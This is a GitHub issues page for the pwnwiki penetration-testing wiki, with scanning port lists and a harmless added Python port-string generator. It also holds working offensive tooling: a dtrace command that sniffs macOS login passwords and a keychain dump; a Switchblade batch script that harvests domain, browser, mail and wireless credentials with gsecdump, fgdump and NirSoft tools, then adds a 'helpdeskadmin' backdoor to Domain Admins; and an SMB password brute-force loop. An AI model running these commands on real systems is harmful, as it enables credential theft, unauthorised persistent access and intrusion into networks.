pwnwiki.github.io's People

Contributors

0xdevalias, arr0way, glennbarrett, jakxx, jmbxtr, kingassune, leebaird, maseh87, mstewartgallus, mubix, nixawk, oj, oneiroi, oxis, su1ph3r, tekwizz123, timwr, v-p-b, wchen-r7, webbreacher, wireghoul, wumb0

pwnwiki.github.io's Issues

OS X Password sniffing

Don't have time to add this in the appropriate place:

sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)

Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt

Import port information into a page

The "easy copy" lines need to be something someone can copy-paste into any tool that accepts comma-separated ports (nmap/metasploit), covering all the ports listed in its category.

Intent: Try to create a series of lists for scanning during a pentest (internal or externally). First for just discovery, then for authenticated access, then for pwnage, and finally just for curiosity.

==========================

All further edits should be done via the wiki on Github.
Thanks for everyone's help and feedback!

==========================


Discovery Ports:
 * easy copy - `21,22,23,25,139,443,445,631,3389,6000-6009,8080,8000,8443`
 * FTP: 21
 * SSH: 22
 * Telnet: 23
 * SMTP: 25
 * Finger: 7
 * HTTP: 80
 * Kerberos: 88
 * POP3: 110
 * SUNRPC (Unix RPC): 111 (think: rpcinfo)
 * NetBIOS: 139
 * IMAP: 143
 * LDAP: 389
 * HTTPS: 443
 * LotusNotes: 1352
 * Microsoft DS: 445
 * RSH: 514
 * CUPS: 631
 * NFS: 2049
 * Webrick (Ruby Webserver): 3000
 * RDP: 3389
 * Munin: 4949
 * SIP: 5060
 * PCAnywhere: 5631 (5632)
 * NRPE (*nix) / NSClient++ (win): 5666 (evidence of Nagios server on network)
 * Alt-HTTP: 8080
 * Alt-HTTP tomcat: 9080
 * Another HTTP: 8000 (mezzanine in development mode for example)
 * Nessus HTTPS: 8834
 * Proxmox: 8006
 * Splunk: 8089 (also on 8000)
 * Alt HTTPS: 8443
 * vSphere: 9443
 * X11: 6000-6009 (+1 to portnum for additional displays) (see xspy, xwd, xkey for exploitation)
 * VNC: 5900, 5901+ (Same as X11; +1 to portnum for each user/display over VNC. SPICE is usually in this range as well)
 * Printers: 9100, 515
 * Dropbox lansync: 17500


UDP Discovery:
 * easy copy - `53,123,161,1434`
 * DNS: 53
 * XDMCP: 177 (via NSE script --script broadcast-xdmcp-discover, discover nix boxes hosting X)
 * OpenVPN: 1194
 * MSSQL Ping: 1434
 * SUNRPC (Unix RPC): 111 (yeah, it's UDP, too)
 * SNMP: 161
 * Network Time Protocol (NTP): 123
 * syslog: 514
 * UPnP: 1900
 * ISAKMP: 500 (IKE PSK attack)
 * VxWorks debug: 17185 (udp)

Authentication Ports (other than ones already listed):
 * easy copy - `1494`
 * Citrix: 1494
 * WinRM: 80,5985 (HTTP), 5986 (HTTPS)
 * VMware Server: 8200, 902, 9084
 * DameWare: 6129

Easy-win Ports:

* Java RMI - 1099, 1098
* coldfusion default stand alone - 8500
* IPMI UDP(623) (easy crack or auth bypass)
* 6002, 7002 (sentinel license monitor (reverse dir traversal, sometimes as SYSTEM))
* GlassFish: 4848
* easy copy - `9060`
* IBM Web Sphere: 9060
* Webmin or BackupExec: 10000
* memcached: 11211
* DistCC: 3632
* SAP Router: 3299

Database Ports:

 * easy copy - `3306,1521-1527,5432,5433,1433,3050,3351,1583,8471,9471`
 * MySQL: 3306
 * PostgreSQL: 5432
 * PostgreSQL 9.2: 5433
 * Oracle TNS Listener: 1521-1527
 * Oracle XDB: 2100
 * MSSQL: 1433
 * Firebird / Interbase: 3050
 * PervasiveSQL: 3351, 1583
 * DB2/AS400: 8471, 9471
 * Sybase: 5000

SCADA / ICS:
(source: http://www.digitalbond.com/tools/the-rack/control-system-port-list/ )
* BACnet/IP: UDP/47808
* DNP3: TCP/20000, UDP/20000
* EtherCAT: UDP/34980
* Ethernet/IP: TCP/44818, UDP/2222, UDP/44818
* FL-net: UDP/55000 to 55003
* Foundation Fieldbus HSE: TCP/1089 to 1091, UDP/1089 to 1091
* ICCP: TCP/102
* Modbus TCP: TCP/502
* OPC UA Binary: Vendor Application Specific
* OPC UA Discovery Server: TCP/4840
* OPC UA XML: TCP/80, TCP/443
* PROFINET: TCP/34962 to 34964, UDP/34962 to 34964
* ROC Plus: TCP/UDP 4000

Interesting Port Ranges:

* HTTP(S) Ports: 8000-9000


Web easy-win URLs: (moved to: https://etherpad.mozilla.org/weburl-easywins )

awk '$2~/tcp$/' nmap-services | sort -r -k3 | head -n 1000 # same for udp
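The issue asks for "easy copy" lines that really do cover every port in their category, and the hand-maintained lines above drift out of sync with the lists (the discovery easy-copy line omits 7, 80, 515, 5900 and 9100, for instance). The following is an added example, not code from pwnwiki, that builds the comma-separated line from the categorised entries and reports which listed ports a hand-written line is missing. The `DISCOVERY_TCP` table is a constructed subset of the discovery list transcribed for the demo; `parse_ports`, `merge_ranges`, `easy_copy` and `missing_from` are names chosen here.

```python
"""Generate nmap/metasploit-style port strings from categorised port notes.

Added example for the pwnwiki port-list issue; not part of the wiki itself.
"""
import re

# Constructed sample: (service, port spec) pairs copied from the issue's
# discovery list. Specs may be a single port, a range or a comma list.
DISCOVERY_TCP = [
    ("FTP", "21"), ("SSH", "22"), ("Telnet", "23"), ("SMTP", "25"),
    ("Finger", "7"), ("HTTP", "80"), ("NetBIOS", "139"),
    ("Microsoft DS", "445"), ("HTTPS", "443"), ("CUPS", "631"),
    ("RDP", "3389"), ("X11", "6000-6009"), ("VNC", "5900, 5901"),
    ("Alt-HTTP", "8080"), ("Another HTTP", "8000"), ("Alt HTTPS", "8443"),
    ("Printers", "9100, 515"),
]

# The issue's own hand-written easy-copy line for the discovery category.
DISCOVERY_EASY_COPY = "21,22,23,25,139,443,445,631,3389,6000-6009,8080,8000,8443"

# One port, or "lo-hi" with optional spaces around the dash.
PORT_RE = re.compile(r"(\d{1,5})(?:\s*-\s*(\d{1,5}))?")


def parse_ports(spec):
    """Expand '21', '6000-6009' or '5900, 5901' into a set of ints.

    Raises ValueError on anything outside 1-65535 or a reversed range,
    so a typo in the notes fails loudly instead of silently scanning nothing.
    """
    ports = set()
    for lo, hi in PORT_RE.findall(spec):
        lo_i = int(lo)
        hi_i = int(hi) if hi else lo_i
        if not 1 <= lo_i <= hi_i <= 65535:
            raise ValueError("bad port spec: %r" % spec)
        ports.update(range(lo_i, hi_i + 1))
    return ports


def merge_ranges(ports):
    """Collapse a set of ints into the compact form nmap -p accepts.

    {21, 22, 23, 80} -> '21-23,80'
    """
    runs = []
    for p in sorted(ports):
        if runs and runs[-1][1] == p - 1:
            runs[-1][1] = p          # extend the current run
        else:
            runs.append([p, p])      # start a new run
    return ",".join(str(a) if a == b else "%d-%d" % (a, b) for a, b in runs)


def easy_copy(entries):
    """Build the de-duplicated easy-copy line for a whole category."""
    all_ports = set()
    for _service, spec in entries:
        all_ports |= parse_ports(spec)
    return merge_ranges(all_ports)


def missing_from(easy_line, entries):
    """Ports that appear in the category list but not in a hand-written line."""
    listed = set()
    for _service, spec in entries:
        listed |= parse_ports(spec)
    return sorted(listed - parse_ports(easy_line))


if __name__ == "__main__":
    print("generated:", easy_copy(DISCOVERY_TCP))
    print("missing from wiki line:", missing_from(DISCOVERY_EASY_COPY, DISCOVERY_TCP))
```

The generated string can be handed straight to a scanner, e.g. `nmap -p "$(python3 ports.py | sed -n 's/^generated: //p')" <target>`, and `missing_from` makes a cheap consistency check to run whenever someone edits the lists.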

Cherry pick the "good" stuff out of the old Hak5 Switchblade commands

Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html

::start of file
@echo off
::create the directory with a computer name for the system and move there
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump%computername% md \switchblade\dump%computername% >nul
cd \switchblade\tools\ >nul
::create netdump.txt with all the information that the dos command net.exe will extract
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-net.log 2>&1
ipconfig /all >> \switchblade\dump%computername%%computername%-net.log 2>&1
route print >> \switchblade\dump%computername%%computername%-net.log 2>&1
ipconfig /displaydns >> \switchblade\dump%computername%%computername%-net.log 2>&1
netstat -anbv >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh diag show all /v >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh firewall show conf >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh firewall show port >> \switchblade\dump%computername%%computername%-net.log 2>&1
arp -a >> \switchblade\dump%computername%%computername%-net.log 2>&1
net session >> \switchblade\dump%computername%%computername%-net.log 2>&1
::user info creation
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-user.log 2>&1
net view >> \switchblade\dump%computername%%computername%-user.log 2>&1
net share >> \switchblade\dump%computername%%computername%-user.log 2>&1
net accounts >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup administrators /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "domain admins" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "backup operators" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "domain users" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
gpresult >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\whosthere.exe >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\whosthere-alt.exe >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump%computername%%computername%-user 2>&1
::dump other PC info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-PC.log 2>&1
net start >> \switchblade\dump%computername%%computername%-PC.log 2>&1
set >> \switchblade\dump%computername%%computername%-PC.log 2>&1
tree /f >> \switchblade\dump%computername%%computername%-PC.log 2>&1
::slurp Browser info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%_browser.log 2>&1
cscript //nologo .\iehistquick.vbs >> \switchblade\dump%computername%%computername%browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump%computername%%computername%browser.log 2>&1
echo ********** [End Of File] ********** >> \switchblade\dump%computername%%computername%_browser.log 2>&1
::create the nirsoft tools html files, some of them are known hacktools and will crash out script depends on your AV killer to run first
nircmd.exe exec2 hide "\switchblade\dump%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump~$sys.computername$\ChromePass.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump~$sys.computername$\DialUp2.html"
::finally if we didnt get caught
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit

Find a way to allow users to generate a pdf from a markdown file

Users may need to print out files from the pwnwiki site. HTML doesn't always play nice with print. Optimally there should be a button or something that a user could click to get a PDF generated from a pwnwiki page.

Also, this will help to move people from using the google documents as an authoritative source.

Mimikatz and WCE

Just thought of this whilst going through "AT is the New Black", but do we actually have any decent documentation on Mimikatz and WCE? If not it would be good to add some good documentation on these two tools to our post exploitation for Windows section, as they tend to come in handy on a pentest.

results not showing

@for /F %n in (users_T.txt) DO @for /F %p in (pass.txt) DO @net use <servername>\IPC$ /user:%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use / delete <servername>IPC$ > NUL

the command runs but nothing shows on the screen...

Need to add Exchange / OWA / Outlook stuff
